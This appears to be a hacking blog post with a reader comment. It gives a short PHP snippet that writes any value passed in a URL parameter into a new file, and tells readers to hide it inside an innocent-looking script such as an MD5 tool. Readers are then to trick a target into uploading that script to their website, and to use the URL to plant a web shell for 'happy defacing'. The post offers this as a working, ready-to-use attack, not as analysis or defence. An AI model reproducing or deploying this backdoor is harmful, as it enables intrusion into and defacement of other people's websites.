Idea By : 0b0xed
Method Tested and 100% work .
What Is Social engineering ?
http://en.wikipedia.org/wiki/Social_engineering_(security)
The target must has WEBSITE to upload the script. Copy and paste to your PHP Tools : –
$dud = $_GET[‘dud’];
$fh = fopen(‘test.php’, ‘a’);
fwrite($fh,$dud);
fclose($fh);
For example,I paste it to my MD5.php ,by using Social Engineering,force the target to upload the file.php to website.
Go to Target Website,for example 127.0.0.1/MD5.php and add ?dud= ,like this 127.0.0.1/MD5.php?dud=(paste your script here) and happy defacing
Your shell located at : 127.0.0.1/test.php
References
- ^ Email This (www.blogger.com)
- ^ BlogThis! (www.blogger.com)
- ^ Share to Twitter (www.blogger.com)
- ^ Share to Facebook (www.blogger.com)
- ^ Share to Pinterest (www.blogger.com)
Sumber : http://0b0xed.tor.my/
I am very grateful for this enlightening article. I am new to this issue, but for me it elucidated several questions. Congratulations on your knowledge on the subject. Thank you very much.SUPERAntiSpyware Professional 6.0.1242
ReplyDelete